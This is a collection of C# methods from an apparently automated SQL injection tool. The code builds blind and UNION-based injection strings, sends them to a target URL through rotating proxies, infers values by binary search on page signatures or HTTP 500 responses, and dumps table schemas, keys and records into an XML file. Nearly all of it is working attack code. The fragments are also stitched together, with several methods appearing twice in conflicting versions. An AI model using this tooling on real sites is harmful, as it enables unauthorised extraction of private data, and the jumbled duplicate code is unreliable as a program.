/// <summary>Takes a partially built schema and continues to download what is left</summary> /// <param name="RecoveredList">The preexisting schema</param> /// <returns>The fully downloaded schema</returns> public GlobalDS.Table[] RecoverTableList(GlobalDS.Table[] RecoveredList) { long[] TableIDs; int TableCount; List<GlobalDS.Table> retVal = new List<GlobalDS.Table>(); List<long> tempTableIDs = new List<long>(); UserStatus("Recovering Table List"); foreach (GlobalDS.Table tbl in RecoveredList) tempTableIDs.Add(tbl.ObjectID); TableIDs = GetTableIDs(tempTableIDs.ToArray()); retVal = new List<GlobalDS.Table>(RecoveredList); TableCount = TableIDs.Length; GlobalDS.Table NewTable; for (int i=0; i < TableCount; i++) { if (RecoveredList.Length < i || RecoveredList[i].Name.Length == 0) { NewTable = RetrieveTable(TableIDs[i]); retVal.Add(NewTable); TableChanged(NewTable); } } return retVal.ToArray(); }
// }}} // {{{ IteratePrimaryKey private GlobalDS.PrimaryKey IteratePrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey, SqlDbType PrimaryKeyType) { switch(PrimaryKeyType) { case SqlDbType.BigInt: case SqlDbType.SmallInt: case SqlDbType.TinyInt: case SqlDbType.Int: return IterateIntegerPrimaryKey(TableName, KeyName, CurrentPrimaryKey); default: return IterateNonIntegerPrimaryKey(TableName, KeyName, CurrentPrimaryKey); } }
private void TargetAttackVector_TableChanged(GlobalDS.Table ChangedTable) { lock (_ThreadGuiMutex) { _LocalGuiQueue.Enqueue(LocalGuiAction.PartialTableInfo); _LocalGuiQueue.Enqueue(ChangedTable); } this.Invoke(new ThreadedSub(UnSafelyUpdateUI)); _AbsintheState.PartialTable = ChangedTable; }
/// <summary>Sets the authentication data</summary> /// <param name="AuthType">The authentication type</param> /// <param name="Username">The authentication username</param> /// <param name="Password">The authentication password</param> public void Authdata(GlobalDS.AuthType AuthType, string Username, string Password) { _AuthUser = Username; _AuthPassword = Password; _AuthDomain = string.Empty; if (AuthType == GlobalDS.AuthType.None) { Authdata(AuthType); return; } _AuthenticationMethod = AuthType; if (AuthType == GlobalDS.AuthType.NTLM) { _AuthenticationMethod = GlobalDS.AuthType.Basic; throw new Exception("Missing Domain information, AuthType set to 'Basic'"); } }
// }}} // {{{ PullDataFromIndividualTable private List<Hashtable> PullDataFromIndividualTable(GlobalDS.Table SrcTable, long[] ColumnIDs, ref XmlTextWriter xOutput) { List<Hashtable> retVal = new List<Hashtable>(); long RecordCounter = 0; GlobalDS.Field[] ColumnList = new GlobalDS.Field[ColumnIDs.Length]; GlobalDS.PrimaryKey CurrentPrimaryKey = new GlobalDS.PrimaryKey(); int ColumnCounter = 0; string PrimaryKeyName = String.Empty; SqlDbType PrimaryKeyType= SqlDbType.Int; UserStatus(String.Format("Individual Pulling {0}", SrcTable.Name)); // Generate Field List for (long FieldCounter = 0; FieldCounter < SrcTable.FieldList.Length; FieldCounter++) { UserStatus(String.Format("Going for Field: {0}", SrcTable.FieldList[FieldCounter].FieldName)); if (Array.IndexOf(ColumnIDs, FieldCounter) >= 0) { ColumnList[ColumnCounter] = SrcTable.FieldList[FieldCounter]; ColumnCounter++; } if (SrcTable.FieldList[FieldCounter].IsPrimary) { PrimaryKeyName = SrcTable.FieldList[FieldCounter].FieldName; PrimaryKeyType = SrcTable.FieldList[FieldCounter].DataType; } } if (PrimaryKeyName.Length > 0) { for (RecordCounter = 0; RecordCounter < SrcTable.RecordCount; RecordCounter++) { CurrentPrimaryKey = IteratePrimaryKey(SrcTable.Name, PrimaryKeyName, CurrentPrimaryKey, PrimaryKeyType); Hashtable Record = GetRecord(SrcTable.Name, ColumnList, CurrentPrimaryKey); retVal.Add(Record); OutputRecordToFile(ref xOutput, Record, CurrentPrimaryKey); } } return retVal; }
// }}} // {{{ GetFieldData private DictionaryEntry GetFieldData(string TableName, GlobalDS.Field Column, GlobalDS.PrimaryKey pk) { DictionaryEntry retVal = new DictionaryEntry(); retVal.Key = Column.FieldName; retVal.Value = string.Empty; if (Column.FieldName.Equals(pk.Name)) { retVal.Value = pk.Value; return retVal; } StringBuilder SelectClause = new StringBuilder(); switch (Column.DataType) { case SqlDbType.BigInt: case SqlDbType.SmallInt: case SqlDbType.TinyInt: case SqlDbType.Int: case SqlDbType.Decimal: case SqlDbType.DateTime: case SqlDbType.Money: case SqlDbType.Float: case SqlDbType.Real: case SqlDbType.SmallDateTime: case SqlDbType.SmallMoney: case SqlDbType.Timestamp: case SqlDbType.UniqueIdentifier: //retVal.Value = OpenEndedIntegerSearch(Column.FieldName, TableName, pk); SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)"); break; case SqlDbType.NChar: case SqlDbType.Char: case SqlDbType.NVarChar: case SqlDbType.Text: case SqlDbType.NText: case SqlDbType.VarChar: //retVal.Value = GetFieldDataVarChar(Column.FieldName, TableName, pk); SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)"); break; case SqlDbType.Bit: //retVal.Value = GetBitField(Column.FieldName, TableName, pk); SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)"); break; case SqlDbType.Image: case SqlDbType.Binary: case SqlDbType.VarBinary: // TODO: Figure out how to support this! //retVal.Value = null; break; } _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect(SelectClause.ToString(), TableName, pk.Name + " = " + pk.Value); string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent); string ResultText = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin); retVal.Value = ResultText.Substring(1, ResultText.Length - 2); return retVal; }
// }}} // {{{ IterateNonIntegerPrimaryKey private GlobalDS.PrimaryKey IterateNonIntegerPrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey) { StringBuilder CurrentVector = new StringBuilder(); CurrentVector.Append(_VectorBuffer); if (CurrentPrimaryKey.Name == KeyName) { CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.LengthOfConvertedPrimaryKeyValue(KeyName, TableName, CurrentPrimaryKey.Value))); } else { CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.LengthOfConvertedPrimaryKeyValue(KeyName, TableName))); } long Size = RecursiveSearch(1,0,CurrentVector.ToString()); StringBuilder KeyValueBuilder = new StringBuilder(); StringBuilder KeyOutputValueBuilder = new StringBuilder(); for (long AscCounter = 1; AscCounter <= Size; AscCounter++) { CurrentVector = new StringBuilder(); CurrentVector.Append(_VectorBuffer); if (CurrentPrimaryKey.Name == KeyName) { CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.ConvertedPrimaryKeyValueCharacter(AscCounter, KeyName, TableName, CurrentPrimaryKey.Value))); } else { CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.ConvertedPrimaryKeyValueCharacter(AscCounter, KeyName, TableName))); } long SearchVal = RecursiveSearch( 1, UNICODE_LIMIT, CurrentVector.ToString()); KeyValueBuilder.Append(_PluginData.CharConversionFunction(SearchVal)).Append(_PluginData.ConcatenationCharacter); KeyOutputValueBuilder.Append(Convert.ToChar(SearchVal)); } KeyValueBuilder.Remove(KeyValueBuilder.Length - _PluginData.ConcatenationCharacter.Length, _PluginData.ConcatenationCharacter.Length); GlobalDS.PrimaryKey retVal = new GlobalDS.PrimaryKey(); retVal.Name = KeyName; //TODO: We should escape this with apostrophes most likely retVal.Value = KeyValueBuilder.ToString(); retVal.OutputValue = KeyOutputValueBuilder.ToString(); return retVal; }
/// <summary>Takes a partially built schema and continues to download what is left</summary> /// <param name="RecoveredList">The preexisting schema</param> /// <returns>The fully downloaded schema</returns> public GlobalDS.Table[] RecoverTableList(GlobalDS.Table[] RecoveredList) { long TableCount; List<GlobalDS.Table> retVal = new List<GlobalDS.Table>(RecoveredList); TableCount = GetTableCount(); GlobalDS.Table NewTable; UserStatus(String.Format("Table Count: {0}", TableCount)); long PreviousTableID; for (int i=RecoveredList.Length; i < TableCount; i++) { if (i == 0) PreviousTableID = 0; else PreviousTableID = ((GlobalDS.Table) retVal[i-1]).ObjectID; NewTable = RetrieveTable(PreviousTableID); retVal.Add(NewTable); TableChanged(NewTable); } return retVal.ToArray(); }
private void TableChanged(GlobalDS.Table ChangedTable) { PartialTable = ChangedTable; }
private void WriteFieldToXml(ref XmlTextWriter xOutput, GlobalDS.Table Tbl) { for (int i = 0; i < Tbl.FieldCount; i++) { xOutput.WriteStartElement("field"); xOutput.WriteStartAttribute("id", null); xOutput.WriteString((i+1).ToString()); xOutput.WriteEndAttribute(); xOutput.WriteStartAttribute("name", null); xOutput.WriteString(Tbl.FieldList[i].FieldName); xOutput.WriteEndAttribute(); xOutput.WriteStartAttribute("datatype", null); xOutput.WriteString(Tbl.FieldList[i].DataType.ToString()); xOutput.WriteEndAttribute(); if (Tbl.FieldList[i].IsPrimary) { xOutput.WriteStartAttribute("primary", null); xOutput.WriteString(true.ToString().ToLower()); xOutput.WriteEndAttribute(); } xOutput.WriteEndElement(); } }
public void AddCookie(GlobalDS.FormParam value) { _Cookies.Add(value.Name, value.DefaultValue); }
///<summary>Adds a form parameter for use during the attack</summary> ///<param name="value">The FormParam object containing the relevant parameter information</param> public void AddFormParameter(GlobalDS.FormParam value) { //_ParentOutput("There are {0} keys in the Parameter list!", _ParamList.Count); _ParamList[value.Name] = value; }
/// <summary>Sets the authentication data</summary> /// <param name="AuthType">The authentication type</param> /// <param name="Credentials">The authentication credentials</param> public void Authdata(GlobalDS.AuthType AuthType, System.Net.NetworkCredential Credentials) { _AuthUser = Credentials.UserName; _AuthPassword = Credentials.Password; _AuthDomain = Credentials.Domain; if (AuthType == GlobalDS.AuthType.None) { Authdata(AuthType); return; } _AuthenticationMethod = AuthType; if (AuthType != GlobalDS.AuthType.NTLM) _AuthDomain = string.Empty; }
private void OutputRecordToFile(ref XmlTextWriter xOutput, Hashtable DataRecord, GlobalDS.PrimaryKey pk) { xOutput.WriteStartElement("DataRecord"); xOutput.WriteStartAttribute("PrimaryKey", null); xOutput.WriteString(pk.Name); xOutput.WriteEndAttribute(); xOutput.WriteStartAttribute("PrimaryKeyValue", null); xOutput.WriteString(pk.OutputValue); xOutput.WriteEndAttribute(); foreach(string Key in DataRecord.Keys) { xOutput.WriteStartElement(Key); xOutput.WriteString(DataRecord[Key].ToString()); xOutput.WriteEndElement(); } xOutput.WriteEndElement(); }
// }}} // {{{ IterateIntegerPrimaryKey private GlobalDS.PrimaryKey IterateIntegerPrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey) { StringBuilder CurrentVector = new StringBuilder(); CurrentVector.Append(_VectorBuffer); if (CurrentPrimaryKey.Name == KeyName) { CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.IntegerPrimaryKeyValue(KeyName, TableName, CurrentPrimaryKey.Value))); } else { CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.IntegerPrimaryKeyValue(KeyName, TableName))); } // Is there a way to force this to be numeric?! long Result = RecursiveSearch(1,0,CurrentVector.ToString()); GlobalDS.PrimaryKey retVal = new GlobalDS.PrimaryKey(); retVal.Name = KeyName; retVal.Value = Result.ToString(); retVal.OutputValue = Result.ToString(); return retVal; }
/// <summary> /// Retrieves the table schema of an injected database /// </summary> /// <param name="TableData">The table data this should be stored into</param> public void PopulateTableStructure(ref GlobalDS.Table TableData) { int FieldCount; FieldCount = GetFieldCount(TableData.ObjectID); for (int i=0; i < FieldCount; i++) { TableData.AddField(GetFieldData(TableData.ObjectID, i)); } }
// }}} // {{{ GetFieldData private DictionaryEntry GetFieldData(string TableName, GlobalDS.Field Column, GlobalDS.PrimaryKey pk) { DictionaryEntry retVal = new DictionaryEntry(); retVal.Key = Column.FieldName; retVal.Value = string.Empty; if (Column.FieldName.Equals(pk.Name)) { retVal.Value = pk.OutputValue; return retVal; } if (true == TestNull(Column.FieldName, TableName, pk)) { //retVal.Value = null; } else { switch (Column.DataType) { case SqlDbType.BigInt: case SqlDbType.SmallInt: case SqlDbType.TinyInt: case SqlDbType.Int: retVal.Value = OpenEndedIntegerSearch(Column.FieldName, TableName, pk); break; case SqlDbType.NChar: case SqlDbType.Char: case SqlDbType.NVarChar: case SqlDbType.Text: case SqlDbType.NText: case SqlDbType.VarChar: retVal.Value = GetFieldDataVarChar(Column.FieldName, TableName, pk); break; case SqlDbType.Decimal: case SqlDbType.DateTime: case SqlDbType.Money: case SqlDbType.Float: case SqlDbType.Real: case SqlDbType.SmallDateTime: case SqlDbType.SmallMoney: case SqlDbType.Timestamp: case SqlDbType.UniqueIdentifier: retVal.Value = GetConvertedFieldData(Column.FieldName, TableName, pk); break; case SqlDbType.Bit: retVal.Value = GetBitField(Column.FieldName, TableName, pk); break; case SqlDbType.Image: case SqlDbType.Binary: case SqlDbType.VarBinary: // TODO: Figure out how to support this! //retVal.Value = null; break; } } return retVal; }
/// <summary>Downloads the contents of the given fields and tables from the database to an XML file.</summary> /// <param name="SrcTable">An array of the tables to pull data from</param> /// <param name="ColumnIDs">An array of the column lists to be pulled from the database. /// The indices from this array should match up with the indices of the SrcTable.</param> /// <param name="xmlFilename">The filename to write the downloaded XML data to.</param> public void PullDataFromTable(GlobalDS.Table[] SrcTable, long[][] ColumnIDs, string xmlFilename) { int TableCount; if (xmlFilename.Length == 0) throw new System.Exception(" No File Defined. "); XmlTextWriter xOutput = new XmlTextWriter(xmlFilename, System.Text.Encoding.UTF8); xOutput.Formatting = Formatting.Indented; xOutput.Indentation = 4; xOutput.WriteStartDocument(); xOutput.WriteStartElement("AbsinthedatabasePull"); xOutput.WriteStartAttribute("version", null); xOutput.WriteString("1.0"); xOutput.WriteEndAttribute(); try { for (TableCount = 0; TableCount < SrcTable.Length; TableCount++) { PullDataFromIndividualTable(SrcTable[TableCount], ColumnIDs[TableCount], ref xOutput); } } catch (Exception e) { UserStatus(e.ToString()); } finally { xOutput.WriteEndElement(); xOutput.WriteEndDocument(); xOutput.Close(); } }
// }}} // {{{ GetBitField private int GetBitField(string FieldName, string TableName, GlobalDS.PrimaryKey pk) { StringBuilder CurrentVector = new StringBuilder(); CurrentVector.Append(_VectorBuffer); CurrentVector.Append(_PluginData.AndEqualWrapper(_PluginData.SelectValueForGivenPrimaryKey(FieldName, TableName, pk))); CurrentVector.Append(" 0"); _AttackParams[_VectorName] = CurrentVector + _VectorPostBuffer; string ResultPage = string.Empty; bool Response200 = true; WebProxy Proxy = RotatedProxy(); try { ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, Proxy, _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent); } catch(WebException wex) { // Adding this as requested by Tom if (((HttpWebResponse)wex.Response).StatusCode == HttpStatusCode.InternalServerError) Response200 = false; else throw; } if (_Options.Throttle > 0) Thread.Sleep(_Options.Throttle); double[] resSig = null; if (!FilterOn500s) resSig = ParsePage.GetHtmlPageSignature(ResultPage, _Options.Delimiter); if ((FilterOn500s && Response200) || (!FilterOn500s && ParsePage.CompareSignatures(TruePageSignature, resSig, TrueFilter, _Options.Tolerance))) { return 0; } else if ((FilterOn500s && !Response200) || (!FilterOn500s && ParsePage.CompareSignatures(FalsePageSignature, resSig, FalseFilter, _Options.Tolerance))) { return 1; } else { UserStatus("Uh oh.. Error page maybe?"); return -1; } }
// }}} // {{{ GetRecord private Hashtable GetRecord(string TableName, GlobalDS.Field[] Columns, GlobalDS.PrimaryKey pk) { int ColumnCounter; Hashtable retVal = new Hashtable(); for (ColumnCounter = 0; ColumnCounter < Columns.Length; ColumnCounter++) { DictionaryEntry de = GetFieldData(TableName, Columns[ColumnCounter], pk); retVal.Add(de.Key, de.Value); } return retVal; }
// }}} // {{{ GetConvertedFieldData private string GetConvertedFieldData(string FieldName, string TableName, GlobalDS.PrimaryKey pk) { StringBuilder FieldBuilder = new StringBuilder(); StringBuilder CurrentVector = new StringBuilder(); CurrentVector.Append(_VectorBuffer); CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.SelectLengthOfConvertedRecordValue(FieldName, TableName, pk))); long Size = RecursiveSearch(1,0,CurrentVector.ToString()); for (long AscCounter = 1; AscCounter <= Size; AscCounter++) { CurrentVector = new StringBuilder(); CurrentVector.Append(_VectorBuffer); CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.SelectCharacterValueForConvertedRecordValue(AscCounter, FieldName, TableName, pk))); FieldBuilder.Append(Convert.ToChar( RecursiveSearch( 1, UNICODE_LIMIT, CurrentVector.ToString() ))); } return FieldBuilder.ToString(); }
private GlobalDS.PrimaryKey IteratePrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey, SqlDbType PrimaryKeyType) { StringBuilder WhereClause = new StringBuilder(); if (CurrentPrimaryKey.Name == KeyName) { WhereClause.Append(KeyName).Append(" > ").Append(CurrentPrimaryKey.Value); } _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, min(" + KeyName + ")) + char(58)", TableName, WhereClause.ToString()); string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent); string ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin); ResultText = ResultText.Substring(1, ResultText.Length-2); string WorkingText = ""; switch(PrimaryKeyType) { case SqlDbType.VarChar: case SqlDbType.Char: case SqlDbType.NChar: case SqlDbType.NText: case SqlDbType.NVarChar: case SqlDbType.Text: StringBuilder ElementBuilder = new StringBuilder(); //split char[] TextElements = ResultText.ToCharArray(); for (int i=0; i < TextElements.Length; i++) { ElementBuilder.Append("char(").Append(Char.GetNumericValue(TextElements[i])).Append(") + "); } ElementBuilder.Remove(ElementBuilder.Length -2,2); // remove trailing '+ ' WorkingText = ElementBuilder.ToString(); break; default: WorkingText = ResultText.Trim(); break; } GlobalDS.PrimaryKey retVal = new GlobalDS.PrimaryKey(); retVal.Name = KeyName; retVal.Value = WorkingText; retVal.OutputValue = ResultText; return retVal; }
///<summary>Retrieve the information about the fields for a given table from the database schema.</summary> ///<param name="TableData">The table to load field info for.</param> public void PopulateTableStructure(ref GlobalDS.Table TableData) { long[] FieldIDs; long PrimaryKey; int FieldCount; FieldIDs = GetFieldIDs(TableData.ObjectID); FieldCount = FieldIDs.Length; PrimaryKey = RetrievePrimaryKey(TableData.ObjectID); for (int i=0; i < FieldCount; i++) { TableData.AddField(RetrieveField(FieldIDs[i], TableData.ObjectID, PrimaryKey)); } }
private void ThreadUnsafeUpdatePartialTable(GlobalDS.Table NewTable) { // Search for this node bool FoundNode = false; TreeNode tid = null; TreeNode SearchID; for (int i=0; i < tvwSchema.Nodes[0].Nodes[1].Nodes.Count; i++) { SearchID = tvwSchema.Nodes[0].Nodes[1].Nodes[i]; if (SearchID.Nodes[0].Nodes[0].Text.Equals(NewTable.ObjectID.ToString())) { tid = SearchID; FoundNode = true; break; } } if (!FoundNode) { tid = tvwSchema.Nodes[0].Nodes[1].Nodes.Add(NewTable.Name); } tid.Nodes.Clear(); tid.Nodes.Add("ID").Nodes.Add(NewTable.ObjectID.ToString()); tid.Nodes.Add("Record Count").Nodes.Add(NewTable.RecordCount.ToString()); tid.Nodes.Add("Fields").Nodes.Add("??? UNKNOWN ???"); }
/// <summary>Sets the Auth data to empty</summary> /// <param name="AuthType">The Auth type, although it doesn't matter what it's set to this overload will set it to "None"</param> public void Authdata(GlobalDS.AuthType AuthType) { _AuthUser = string.Empty; _AuthPassword = string.Empty; _AuthDomain = string.Empty; _AuthenticationMethod = GlobalDS.AuthType.None; if (AuthType != GlobalDS.AuthType.None) { throw new Exception("Missing Information, AuthType set to 'None'"); } return; }